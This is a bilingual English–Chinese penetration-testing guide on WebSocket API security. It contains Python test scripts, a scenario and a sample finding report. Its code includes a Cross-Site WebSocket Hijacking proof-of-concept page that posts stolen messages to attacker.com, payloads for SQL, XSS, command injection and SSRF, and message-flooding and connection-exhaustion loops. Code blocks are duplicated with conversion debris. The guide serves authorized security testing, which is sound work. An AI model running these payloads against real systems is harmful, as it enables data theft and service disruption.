testing-websocket-api-security
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChineseTesting WebSocket API Security
WebSocket API安全测试
When to Use
使用场景
- Assessing real-time communication APIs that use WebSocket (ws://) or Secure WebSocket (wss://) protocols
- Testing for Cross-Site WebSocket Hijacking (CSWSH) where an attacker's page connects to a legitimate WebSocket server
- Evaluating authentication and authorization enforcement on WebSocket connections and messages
- Testing input validation on WebSocket message payloads for injection vulnerabilities
- Assessing WebSocket implementations for denial-of-service through message flooding or oversized frames
Do not use without written authorization. WebSocket testing may disrupt real-time services and affect other connected users.
- 评估使用WebSocket(ws://)或安全WebSocket(wss://)协议的实时通信API
- 测试跨站WebSocket劫持(CSWSH),即攻击者的页面连接到合法WebSocket服务器的场景
- 评估WebSocket连接和消息上的身份验证与授权执行情况
- 测试WebSocket消息负载的输入验证,排查注入漏洞
- 评估WebSocket实现是否存在通过消息泛洪或超大帧导致的拒绝服务风险
未经书面授权请勿使用。WebSocket测试可能会中断实时服务,影响其他连接用户。
Prerequisites
前置条件
- Written authorization specifying the WebSocket endpoint and testing scope
- Burp Suite Professional with WebSocket interception capability
- Python 3.10+ with and
websocketslibrariesasyncio - Browser developer tools for observing WebSocket handshakes and frames
- wscat CLI tool for manual WebSocket interaction:
npm install -g wscat - Knowledge of the WebSocket subprotocol in use (JSON-RPC, STOMP, custom)
- 明确WebSocket端点和测试范围的书面授权
- 具备WebSocket拦截功能的Burp Suite Professional
- 安装了和
websockets库的Python 3.10+环境asyncio - 用于观察WebSocket握手和帧的浏览器开发者工具
- 用于手动WebSocket交互的wscat CLI工具:
npm install -g wscat - 了解当前使用的WebSocket子协议(JSON-RPC、STOMP或自定义协议)
Workflow
测试流程
Step 1: WebSocket Endpoint Discovery and Handshake Analysis
步骤1:WebSocket端点发现与握手分析
python
import asyncio
import websockets
import json
import ssl
import time
WS_URL = "wss://target-api.example.com/ws"
AUTH_TOKEN = "Bearer <token>"python
import asyncio
import websockets
import json
import ssl
import time
WS_URL = "wss://target-api.example.com/ws"
AUTH_TOKEN = "Bearer <token>"Capture and analyze the WebSocket handshake
Capture and analyze the WebSocket handshake
async def analyze_handshake():
"""Analyze WebSocket upgrade request and response headers."""
try:
async with websockets.connect(
WS_URL,
extra_headers={"Authorization": AUTH_TOKEN},
ssl=ssl.create_default_context()
) as ws:
print(f"Connected to: {WS_URL}")
print(f"Protocol: {ws.subprotocol}")
print(f"Extensions: {ws.extensions}")
# Send a test message
test_msg = json.dumps({"type": "ping"})
await ws.send(test_msg)
response = await asyncio.wait_for(ws.recv(), timeout=5)
print(f"Server response: {response}")
return True
except websockets.exceptions.InvalidStatusCode as e:
print(f"Connection rejected: {e.status_code}")
return False
except Exception as e:
print(f"Connection error: {e}")
return Falseasyncio.run(analyze_handshake())
undefinedasync def analyze_handshake():
"""Analyze WebSocket upgrade request and response headers."""
try:
async with websockets.connect(
WS_URL,
extra_headers={"Authorization": AUTH_TOKEN},
ssl=ssl.create_default_context()
) as ws:
print(f"Connected to: {WS_URL}")
print(f"Protocol: {ws.subprotocol}")
print(f"Extensions: {ws.extensions}")
# Send a test message
test_msg = json.dumps({"type": "ping"})
await ws.send(test_msg)
response = await asyncio.wait_for(ws.recv(), timeout=5)
print(f"Server response: {response}")
return True
except websockets.exceptions.InvalidStatusCode as e:
print(f"Connection rejected: {e.status_code}")
return False
except Exception as e:
print(f"Connection error: {e}")
return Falseasyncio.run(analyze_handshake())
undefinedStep 2: Authentication and Authorization Testing
步骤2:身份验证与授权测试
python
async def test_ws_authentication():
"""Test if WebSocket requires authentication."""
results = []
# Test 1: Connect without any authentication
try:
async with websockets.connect(WS_URL) as ws:
await ws.send(json.dumps({"type": "get_user_data"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({
"test": "No authentication",
"status": "VULNERABLE",
"response": resp[:200]
})
print(f"[VULN] WebSocket accessible without authentication")
except websockets.exceptions.InvalidStatusCode:
results.append({"test": "No authentication", "status": "SECURE"})
except Exception as e:
results.append({"test": "No authentication", "status": f"ERROR: {e}"})
# Test 2: Connect with invalid token
try:
async with websockets.connect(WS_URL,
extra_headers={"Authorization": "Bearer invalid_token"}) as ws:
await ws.send(json.dumps({"type": "get_user_data"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({
"test": "Invalid token",
"status": "VULNERABLE",
"response": resp[:200]
})
except websockets.exceptions.InvalidStatusCode:
results.append({"test": "Invalid token", "status": "SECURE"})
except Exception as e:
results.append({"test": "Invalid token", "status": f"ERROR: {e}"})
# Test 3: Connect with expired token
expired_token = "Bearer eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MDAwMDAwMDB9.expired"
try:
async with websockets.connect(WS_URL,
extra_headers={"Authorization": expired_token}) as ws:
await ws.send(json.dumps({"type": "get_user_data"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({"test": "Expired token", "status": "VULNERABLE"})
except (websockets.exceptions.InvalidStatusCode, Exception):
results.append({"test": "Expired token", "status": "SECURE"})
# Test 4: Token in query parameter (leakage risk)
try:
async with websockets.connect(f"{WS_URL}?token={AUTH_TOKEN}") as ws:
await ws.send(json.dumps({"type": "ping"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({
"test": "Token in URL",
"status": "INFO - Token accepted in query parameter (may leak in logs)"
})
except Exception:
results.append({"test": "Token in URL", "status": "REJECTED"})
for r in results:
print(f" [{r['status'][:10]}] {r['test']}")
return results
asyncio.run(test_ws_authentication())python
async def test_ws_authentication():
"""Test if WebSocket requires authentication."""
results = []
# Test 1: Connect without any authentication
try:
async with websockets.connect(WS_URL) as ws:
await ws.send(json.dumps({"type": "get_user_data"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({
"test": "No authentication",
"status": "VULNERABLE",
"response": resp[:200]
})
print(f"[VULN] WebSocket accessible without authentication")
except websockets.exceptions.InvalidStatusCode:
results.append({"test": "No authentication", "status": "SECURE"})
except Exception as e:
results.append({"test": "No authentication", "status": f"ERROR: {e}"})
# Test 2: Connect with invalid token
try:
async with websockets.connect(WS_URL,
extra_headers={"Authorization": "Bearer invalid_token"}) as ws:
await ws.send(json.dumps({"type": "get_user_data"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({
"test": "Invalid token",
"status": "VULNERABLE",
"response": resp[:200]
})
except websockets.exceptions.InvalidStatusCode:
results.append({"test": "Invalid token", "status": "SECURE"})
except Exception as e:
results.append({"test": "Invalid token", "status": f"ERROR: {e}"})
# Test 3: Connect with expired token
expired_token = "Bearer eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MDAwMDAwMDB9.expired"
try:
async with websockets.connect(WS_URL,
extra_headers={"Authorization": expired_token}) as ws:
await ws.send(json.dumps({"type": "get_user_data"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({
"test": "Expired token",
"status": "VULNERABLE"
})
except (websockets.exceptions.InvalidStatusCode, Exception):
results.append({"test": "Expired token", "status": "SECURE"})
# Test 4: Token in query parameter (leakage risk)
try:
async with websockets.connect(f"{WS_URL}?token={AUTH_TOKEN}") as ws:
await ws.send(json.dumps({"type": "ping"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({
"test": "Token in URL",
"status": "INFO - Token accepted in query parameter (may leak in logs)"
})
except Exception:
results.append({"test": "Token in URL", "status": "REJECTED"})
for r in results:
print(f" [{r['status'][:10]}] {r['test']}")
return results
asyncio.run(test_ws_authentication())Step 3: Cross-Site WebSocket Hijacking (CSWSH) Testing
步骤3:跨站WebSocket劫持(CSWSH)测试
python
async def test_cswsh():
"""Test for Cross-Site WebSocket Hijacking vulnerability."""
# CSWSH occurs when the WebSocket server does not validate the Origin header
# An attacker's website can connect to the legitimate WebSocket and steal data
origins_to_test = [
None, # No Origin header
"https://evil.com", # Attacker domain
"https://target-api.example.com.evil.com", # Subdomain confusion
"null", # Null origin (sandboxed iframe)
"https://target-api.example.com", # Legitimate origin
"http://target-api.example.com", # HTTP downgrade
]
print("=== CSWSH Testing ===\n")
for origin in origins_to_test:
try:
headers = {"Authorization": AUTH_TOKEN}
if origin:
headers["Origin"] = origin
async with websockets.connect(WS_URL, extra_headers=headers) as ws:
# Try to receive data that should be restricted
await ws.send(json.dumps({"type": "get_messages"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
if origin and origin != "https://target-api.example.com":
print(f"[CSWSH] Origin '{origin}' -> ACCEPTED (data received)")
else:
print(f"[OK] Origin '{origin}' -> Accepted (legitimate)")
except websockets.exceptions.InvalidStatusCode as e:
print(f"[BLOCKED] Origin '{origin}' -> Rejected ({e.status_code})")
except Exception as e:
print(f"[ERROR] Origin '{origin}' -> {e}")
asyncio.run(test_cswsh())python
async def test_cswsh():
"""Test for Cross-Site WebSocket Hijacking vulnerability."""
# CSWSH occurs when the WebSocket server does not validate the Origin header
# An attacker's website can connect to the legitimate WebSocket and steal data
origins_to_test = [
None, # No Origin header
"https://evil.com", # Attacker domain
"https://target-api.example.com.evil.com", # Subdomain confusion
"null", # Null origin (sandboxed iframe)
"https://target-api.example.com", # Legitimate origin
"http://target-api.example.com", # HTTP downgrade
]
print("=== CSWSH Testing ===\n")
for origin in origins_to_test:
try:
headers = {"Authorization": AUTH_TOKEN}
if origin:
headers["Origin"] = origin
async with websockets.connect(WS_URL, extra_headers=headers) as ws:
# Try to receive data that should be restricted
await ws.send(json.dumps({"type": "get_messages"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
if origin and origin != "https://target-api.example.com":
print(f"[CSWSH] Origin '{origin}' -> ACCEPTED (data received)")
else:
print(f"[OK] Origin '{origin}' -> Accepted (legitimate)")
except websockets.exceptions.InvalidStatusCode as e:
print(f"[BLOCKED] Origin '{origin}' -> Rejected ({e.status_code})")
except Exception as e:
print(f"[ERROR] Origin '{origin}' -> {e}")
asyncio.run(test_cswsh())PoC HTML page for CSWSH exploitation
PoC HTML page for CSWSH exploitation
CSWSH_POC = """
<!DOCTYPE html>
<html>
<head><title>CSWSH PoC</title></head>
<body>
<script>
// This page, hosted on attacker.com, connects to the target WebSocket
// If the server doesn't validate Origin, the victim's browser will
// send cookies/credentials and the attacker receives the data
var ws = new WebSocket("wss://target-api.example.com/ws");
ws.onopen = function() {
console.log("Connected to target WebSocket");
ws.send(JSON.stringify({type: "get_messages"}));
ws.send(JSON.stringify({type: "get_user_data"}));
};
ws.onmessage = function(event) {
console.log("Stolen data:", event.data);
// Exfiltrate to attacker server
fetch("https://attacker.com/collect", {
method: "POST",
body: event.data
});
};
</script>
<p>Loading... (CSWSH attack in progress)</p>
</body>
</html>
"""
```CSWSH_POC = """
<!DOCTYPE html>
<html>
<head><title>CSWSH PoC</title></head>
<body>
<script>
// This page, hosted on attacker.com, connects to the target WebSocket
// If the server doesn't validate Origin, the victim's browser will
// send cookies/credentials and the attacker receives the data
var ws = new WebSocket("wss://target-api.example.com/ws");
ws.onopen = function() {
console.log("Connected to target WebSocket");
ws.send(JSON.stringify({type: "get_messages"}));
ws.send(JSON.stringify({type: "get_user_data"}));
};
ws.onmessage = function(event) {
console.log("Stolen data:", event.data);
// Exfiltrate to attacker server
fetch("https://attacker.com/collect", {
method: "POST",
body: event.data
});
};
</script>
<p>Loading... (CSWSH attack in progress)</p>
</body>
</html>
"""
```Step 4: WebSocket Message Injection Testing
步骤4:WebSocket消息注入测试
python
async def test_ws_injection():
"""Test WebSocket messages for injection vulnerabilities."""
INJECTION_PAYLOADS = {
"sql": [
{"type": "search", "query": "' OR '1'='1"},
{"type": "search", "query": "'; DROP TABLE messages;--"},
{"type": "get_message", "id": "1 UNION SELECT username,password FROM users--"},
],
"nosql": [
{"type": "search", "query": {"$ne": ""}},
{"type": "get_user", "filter": {"$gt": ""}},
],
"xss": [
{"type": "send_message", "content": "<script>alert('xss')</script>"},
{"type": "send_message", "content": "<img src=x onerror=alert(1)>"},
{"type": "update_name", "name": "Test<script>document.location='https://evil.com'</script>"},
],
"command": [
{"type": "process", "file": "test; cat /etc/passwd"},
{"type": "convert", "input": "test | id"},
],
"ssrf": [
{"type": "load_url", "url": "http://169.254.169.254/latest/meta-data/"},
{"type": "webhook", "callback": "http://localhost:6379/"},
],
"overflow": [
{"type": "send_message", "content": "A" * 100000},
{"type": "search", "query": "B" * 1000000},
],
}
async with websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN}) as ws:
for category, payloads in INJECTION_PAYLOADS.items():
for payload in payloads:
try:
await ws.send(json.dumps(payload))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
# Analyze response for injection indicators
resp_lower = resp.lower()
indicators = []
if any(kw in resp_lower for kw in ["sql", "syntax", "mysql", "postgresql"]):
indicators.append("SQL error")
if any(kw in resp_lower for kw in ["root:", "uid=", "etc/passwd"]):
indicators.append("Command output")
if any(kw in resp_lower for kw in ["ami-id", "instance-id", "metadata"]):
indicators.append("SSRF data")
if "script" in resp_lower and "xss" not in category:
indicators.append("Reflected XSS")
if indicators:
print(f"[{category.upper()}] {json.dumps(payload)[:60]} -> {indicators}")
elif len(resp) > 10000:
print(f"[OVERFLOW] Large response: {len(resp)} bytes")
except asyncio.TimeoutError:
pass
except websockets.exceptions.ConnectionClosed:
print(f"[CRASH] Connection closed after {category} payload")
# Reconnect
break
asyncio.run(test_ws_injection())python
async def test_ws_injection():
"""Test WebSocket messages for injection vulnerabilities."""
INJECTION_PAYLOADS = {
"sql": [
{"type": "search", "query": "' OR '1'='1"},
{"type": "search", "query": "'; DROP TABLE messages;--"},
{"type": "get_message", "id": "1 UNION SELECT username,password FROM users--"},
],
"nosql": [
{"type": "search", "query": {"$ne": ""}},
{"type": "get_user", "filter": {"$gt": ""}},
],
"xss": [
{"type": "send_message", "content": "<script>alert('xss')</script>"},
{"type": "send_message", "content": "<img src=x onerror=alert(1)>"},
{"type": "update_name", "name": "Test<script>document.location='https://evil.com'</script>"},
],
"command": [
{"type": "process", "file": "test; cat /etc/passwd"},
{"type": "convert", "input": "test | id"},
],
"ssrf": [
{"type": "load_url", "url": "http://169.254.169.254/latest/meta-data/"},
{"type": "webhook", "callback": "http://localhost:6379/"},
],
"overflow": [
{"type": "send_message", "content": "A" * 100000},
{"type": "search", "query": "B" * 1000000},
],
}
async with websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN}) as ws:
for category, payloads in INJECTION_PAYLOADS.items():
for payload in payloads:
try:
await ws.send(json.dumps(payload))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
# Analyze response for injection indicators
resp_lower = resp.lower()
indicators = []
if any(kw in resp_lower for kw in ["sql", "syntax", "mysql", "postgresql"]):
indicators.append("SQL error")
if any(kw in resp_lower for kw in ["root:", "uid=", "etc/passwd"]):
indicators.append("Command output")
if any(kw in resp_lower for kw in ["ami-id", "instance-id", "metadata"]):
indicators.append("SSRF data")
if "script" in resp_lower and "xss" not in category:
indicators.append("Reflected XSS")
if indicators:
print(f"[{category.upper()}] {json.dumps(payload)[:60]} -> {indicators}")
elif len(resp) > 10000:
print(f"[OVERFLOW] Large response: {len(resp)} bytes")
except asyncio.TimeoutError:
pass
except websockets.exceptions.ConnectionClosed:
print(f"[CRASH] Connection closed after {category} payload")
# Reconnect
break
asyncio.run(test_ws_injection())Step 5: Denial-of-Service Testing
步骤5:拒绝服务测试
python
async def test_ws_dos():
"""Test WebSocket for DoS vulnerabilities."""
print("=== WebSocket DoS Testing ===\n")
# Test 1: Message flooding
async def flood_test():
async with websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN}) as ws:
count = 0
start = time.time()
for i in range(10000):
try:
await ws.send(json.dumps({"type": "ping", "id": i}))
count += 1
except websockets.exceptions.ConnectionClosed:
break
elapsed = time.time() - start
print(f" Flood test: {count} messages in {elapsed:.1f}s ({count/elapsed:.0f} msg/s)")
await flood_test()
# Test 2: Large message
async def large_message_test():
sizes = [1024, 10240, 102400, 1024000, 10240000] # 1KB to 10MB
async with websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN},
max_size=20*1024*1024) as ws:
for size in sizes:
try:
large_msg = json.dumps({"type": "data", "payload": "A" * size})
await ws.send(large_msg)
resp = await asyncio.wait_for(ws.recv(), timeout=5)
print(f" Large message ({size} bytes): Accepted")
except (websockets.exceptions.ConnectionClosed, asyncio.TimeoutError) as e:
print(f" Large message ({size} bytes): Rejected/Disconnected")
break
await large_message_test()
# Test 3: Connection exhaustion
async def connection_exhaustion():
connections = []
for i in range(100):
try:
ws = await websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN})
connections.append(ws)
except Exception:
break
print(f" Connection exhaustion: {len(connections)} concurrent connections established")
for ws in connections:
await ws.close()
await connection_exhaustion()
asyncio.run(test_ws_dos())python
async def test_ws_dos():
"""Test WebSocket for DoS vulnerabilities."""
print("=== WebSocket DoS Testing ===\n")
# Test 1: Message flooding
async def flood_test():
async with websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN}) as ws:
count = 0
start = time.time()
for i in range(10000):
try:
await ws.send(json.dumps({"type": "ping", "id": i}))
count += 1
except websockets.exceptions.ConnectionClosed:
break
elapsed = time.time() - start
print(f" Flood test: {count} messages in {elapsed:.1f}s ({count/elapsed:.0f} msg/s)")
await flood_test()
# Test 2: Large message
async def large_message_test():
sizes = [1024, 10240, 102400, 1024000, 10240000] # 1KB to 10MB
async with websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN},
max_size=20*1024*1024) as ws:
for size in sizes:
try:
large_msg = json.dumps({"type": "data", "payload": "A" * size})
await ws.send(large_msg)
resp = await asyncio.wait_for(ws.recv(), timeout=5)
print(f" Large message ({size} bytes): Accepted")
except (websockets.exceptions.ConnectionClosed, asyncio.TimeoutError) as e:
print(f" Large message ({size} bytes): Rejected/Disconnected")
break
await large_message_test()
# Test 3: Connection exhaustion
async def connection_exhaustion():
connections = []
for i in range(100):
try:
ws = await websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN})
connections.append(ws)
except Exception:
break
print(f" Connection exhaustion: {len(connections)} concurrent connections established")
for ws in connections:
await ws.close()
await connection_exhaustion()
asyncio.run(test_ws_dos())Key Concepts
核心概念
| Term | Definition |
|---|---|
| WebSocket | Full-duplex communication protocol over a single TCP connection, established via HTTP upgrade handshake |
| CSWSH | Cross-Site WebSocket Hijacking - an attack where a malicious website initiates a WebSocket connection to a legitimate server using the victim's browser credentials |
| Origin Validation | Server-side check of the Origin header during WebSocket handshake to prevent CSWSH by rejecting connections from unauthorized domains |
| WebSocket Frame | The basic unit of data in WebSocket communication, containing opcode, masking, payload length, and payload data |
| Upgrade Handshake | HTTP request with |
| Message Flooding | Sending a large volume of WebSocket messages to exhaust server resources (memory, CPU, bandwidth) |
| 术语 | 定义 |
|---|---|
| WebSocket | 基于单个TCP连接的全双工通信协议,通过HTTP升级握手建立连接 |
| CSWSH | 跨站WebSocket劫持——攻击者的网站利用受害者浏览器的凭证,向合法服务器发起WebSocket连接的攻击 |
| Origin验证 | WebSocket握手期间服务器端对Origin头的检查,通过拒绝来自未授权域名的连接来防范CSWSH |
| WebSocket帧 | WebSocket通信中的基本数据单元,包含操作码、掩码、负载长度和负载数据 |
| 升级握手 | 包含 |
| 消息泛洪 | 发送大量WebSocket消息以耗尽服务器资源(内存、CPU、带宽) |
Tools & Systems
工具与系统
- Burp Suite Professional: Intercepts WebSocket handshakes and messages, allows message modification and replay
- OWASP ZAP: WebSocket testing with message fuzzing, interception, and breakpoint capabilities
- wscat: Command-line WebSocket client for manual testing:
wscat -c wss://target.com/ws -H "Authorization: Bearer token" - websocat: Advanced CLI WebSocket tool with proxy, broadcast, and scripting capabilities
- Autobahn TestSuite: Comprehensive WebSocket protocol compliance and security testing framework
- Burp Suite Professional:拦截WebSocket握手和消息,支持消息修改与重放
- OWASP ZAP:具备消息模糊测试、拦截和断点功能的WebSocket测试工具
- wscat:用于手动测试的命令行WebSocket客户端:
wscat -c wss://target.com/ws -H "Authorization: Bearer token" - websocat:具备代理、广播和脚本功能的高级CLI WebSocket工具
- Autobahn TestSuite:全面的WebSocket协议合规性与安全测试框架
Common Scenarios
常见场景
Scenario: Chat Application WebSocket Security Assessment
场景:聊天应用WebSocket安全评估
Context: A messaging application uses WebSocket for real-time chat. The WebSocket endpoint handles message delivery, typing indicators, read receipts, and user presence. Authentication is cookie-based.
Approach:
- Analyze the WebSocket handshake: connection established at with session cookie authentication
wss://chat.example.com/ws - Test CSWSH: WebSocket server does not validate the Origin header - an attacker's page can connect and receive the victim's messages
- Test authentication: WebSocket accepts connections with expired session cookies (session validation only at handshake, not for subsequent messages)
- Test authorization: User A can send messages to private channels they are not a member of by crafting the channel ID
- Test injection: Message content is stored without sanitization; XSS payload in message body executes in other users' browsers
- Test message flooding: Server accepts 5000 messages per second without rate limiting, causing CPU spike
- Find that WebSocket messages include the sender's internal user ID, email, and IP address (information leakage)
Pitfalls:
- Not testing CSWSH because the application uses token-based authentication (cookies are automatically sent with WebSocket)
- Only testing the initial handshake authentication without verifying ongoing message authorization
- Missing injection vulnerabilities because payloads are in JSON WebSocket frames instead of HTTP parameters
- Not testing reconnection behavior (does the server re-validate authentication on reconnect?)
- Ignoring that WebSocket connections may bypass HTTP-level rate limiting and WAF rules
背景:一款消息应用使用WebSocket实现实时聊天。WebSocket端点处理消息传递、输入指示器、已读回执和用户在线状态。身份验证基于Cookie。
测试方法:
- 分析WebSocket握手:连接建立在,使用会话Cookie进行身份验证
wss://chat.example.com/ws - 测试CSWSH:WebSocket服务器未验证Origin头——攻击者的页面可连接并接收受害者的消息
- 测试身份验证:WebSocket接受过期会话Cookie的连接(仅在握手时验证会话,后续消息不验证)
- 测试授权:用户A可通过构造频道ID,向其未加入的私有频道发送消息
- 测试注入:消息内容未经过滤就存储;消息体中的XSS负载会在其他用户的浏览器中执行
- 测试消息泛洪:服务器在无速率限制的情况下每秒接受5000条消息,导致CPU飙升
- 发现WebSocket消息包含发送者的内部用户ID、邮箱和IP地址(信息泄露)
常见误区:
- 因为应用使用基于令牌的身份验证而不测试CSWSH(Cookie会随WebSocket自动发送)
- 仅测试初始握手的身份验证,未验证后续消息的授权
- 忽略注入漏洞,因为负载在JSON WebSocket帧中而非HTTP参数里
- 未测试重连行为(服务器在重连时是否重新验证身份?)
- 忽略WebSocket连接可能绕过HTTP层面的速率限制和WAF规则
Output Format
输出格式
undefinedundefinedFinding: Cross-Site WebSocket Hijacking Enables Real-Time Data Theft
发现:跨站WebSocket劫持可实现实时数据窃取
ID: API-WS-001
Severity: High (CVSS 8.1)
Affected Endpoint: wss://chat.example.com/ws
Description:
The WebSocket server does not validate the Origin header during the
handshake. An attacker can host a malicious web page that opens a
WebSocket connection to the chat server using the victim's session
cookie. All messages, typing indicators, and presence data are
forwarded to the attacker in real time.
Proof of Concept:
Host the CSWSH PoC page on attacker.com. When a logged-in user
visits the page, the JavaScript establishes a WebSocket connection
to the chat server. The server authenticates the connection using
the victim's cookie and delivers all real-time chat data to the
attacker's connection.
Impact:
Real-time interception of all private messages, presence data,
and typing indicators for any user who visits the attacker's page.
Remediation:
- Validate the Origin header against an allowlist of legitimate domains
- Implement CSRF tokens in the WebSocket handshake URL
- Use token-based authentication (Authorization header) instead of cookies for WebSocket
- Implement per-message authorization checks, not just connection-level authentication
- Add rate limiting on WebSocket message volume per connection
undefinedID:API-WS-001
严重程度:高(CVSS 8.1)
受影响端点:wss://chat.example.com/ws
描述:
WebSocket服务器在握手期间未验证Origin头。攻击者可托管恶意网页,利用受害者的会话Cookie打开与聊天服务器的WebSocket连接。所有消息、输入指示器和在线状态数据都会实时转发给攻击者。
验证证明:
在attacker.com托管CSWSH PoC页面。当已登录用户访问该页面时,JavaScript会建立与聊天服务器的WebSocket连接。服务器使用受害者的Cookie对连接进行身份验证,并将所有实时聊天数据发送给攻击者的连接。
影响:
任何访问攻击者页面的用户,其所有私人消息、在线状态数据和输入指示器都会被实时拦截。
修复建议:
- 根据合法域名允许列表验证Origin头
- 在WebSocket握手URL中实现CSRF令牌
- 使用基于令牌的身份验证(Authorization头)替代Cookie进行WebSocket验证
- 实现每条消息的授权检查,而非仅连接层面的身份验证
- 为每个连接的WebSocket消息量添加速率限制
undefined